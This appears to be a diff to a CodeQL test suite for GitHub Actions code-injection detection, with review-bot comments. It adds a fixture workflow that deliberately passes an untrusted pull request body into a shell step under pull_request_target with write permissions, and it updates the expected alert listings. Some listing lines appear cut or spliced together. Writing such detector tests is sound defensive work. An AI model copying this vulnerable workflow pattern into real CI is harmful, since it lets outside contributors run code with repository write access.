b/ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml 
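Review bot: The unnamed step `- shell: bash` / `run: | echo "${{ inputs.body }}"` right after "Install Dependencies" is the injection sink this fixture exists to exercise (the updated .expected pairs `input body` at 66:3 with `inputs.body` at 96:16), yet unlike every other step it has no `name:` and nothing marks it as deliberate, so a later refresh of this vendored copy from upstream could silently drop it and with it the expected alert. Suggest `name: Test sink (intentionally vulnerable)` plus a comment `# Added for testing: untrusted input interpolated into a run step`, and a one-line header noting that the file is a modified copy rather than a verbatim mirror. The other expression interpolations into shell in this file, `git config --global user.name "${{ inputs.github_username }}"` and `git pull origin ${{ github.head_ref || github.ref }}`, are presumably not the target of the test, so a comment distinguishing them from the intended sink would spare the next reader the same question.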
@@ -0,0 +1,36 @@ +# Ultralytics 🚀 - AGPL-3.0 License https://ultralytics.com/license +# Ultralytics Actions https://github.com/ultralytics/actions +# This workflow automatically formats code and documentation in PRs to official Ultralytics standards + +name: Ultralytics Actions + +on: + issues: + types: [opened, edited] + discussion: + types: [created] + pull_request_target: + branches: [main] + types: [opened, closed, synchronize, review_requested] + +permissions: + contents: write + +jobs: + format: + runs-on: ubuntu-latest + steps: + - name: Run Ultralytics Formatting + uses: ultralytics/actions@main + with: + token: ${{ secrets._GITHUB_TOKEN }} # note GITHUB_TOKEN automatically generated + labels: true # autolabel issues and PRs + python: true # format Python code and docstrings + prettier: true # format YAML, JSON, Markdown and CSS + spelling: true # check spelling + links: false # check broken links + summary: true # print PR summary with GPT4o (requires 'openai_api_key') + openai_api_key: ${{ secrets.OPENAI_API_KEY }} + first_issue_response: "foo" + body: ${{ github.event.pull_request.body }} + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index b2afe0577aab..c2bd8a1bc62d 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
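Review bot: test29.yml carries only the upstream Ultralytics license header and no comment saying what the test checks, so the link between this workflow and the new `.github/actions/external/ultralytics/actions/action.yaml` fixture is implicit. A short header such as `# Test: pull_request_target passes github.event.pull_request.body as the 'body' input of an external composite action resolved from .github/actions/external/` would document both the trigger/sink pair under test and the directory convention this commit introduces. It would also help to note inline that `uses: ultralytics/actions@main` is resolved to the local copy regardless of the `@main` ref, if that is how the new lookup works — I cannot confirm that from these hunks.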
@@ -8,16 +8,12 @@ edges | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log 
| provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/actions/external/ultralytics/actions/action.yaml:66:3:66:6 | input body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | 
provenance | | @@ -53,7 +49,7 @@ edges | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | provenance | | | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | provenance | | -| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | 
@@ -61,6 +57,11 @@ edges | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | provenance | | | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | provenance | | | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | 
input taint | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | provenance | | | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | provenance | | | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | provenance | | 
@@ -98,7 +99,7 @@ edges | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | -| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -211,6 +212,7 @@ edges | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | -| 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | semmle.label | input title | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | semmle.label | steps.out.outputs.replaced | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/actions/external/ultralytics/actions/action.yaml:66:3:66:6 | input body | semmle.label | input body | +| .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | semmle.label | inputs.body | +| .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | semmle.label | github.head_ref \|\| github.ref | | 
.github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -336,6 +331,16 @@ nodes | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global 
user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | 
github.event.pages[11].title | | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | 
@@ -621,6 +626,7 @@ nodes | .github/workflows/test27.yml:41:9:46:2 | Run Step: get-version [chart_version] | semmle.label | Run Step: get-version [chart_version] | | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | .github/workflows/test29.yml:35:18:35:54 | github.event.pull_request.body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | ${{ inputs.body }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | +| .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | issues | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | workflow_run | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | workflow_run | 
@@ -695,6 +698,11 @@ subpaths | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | 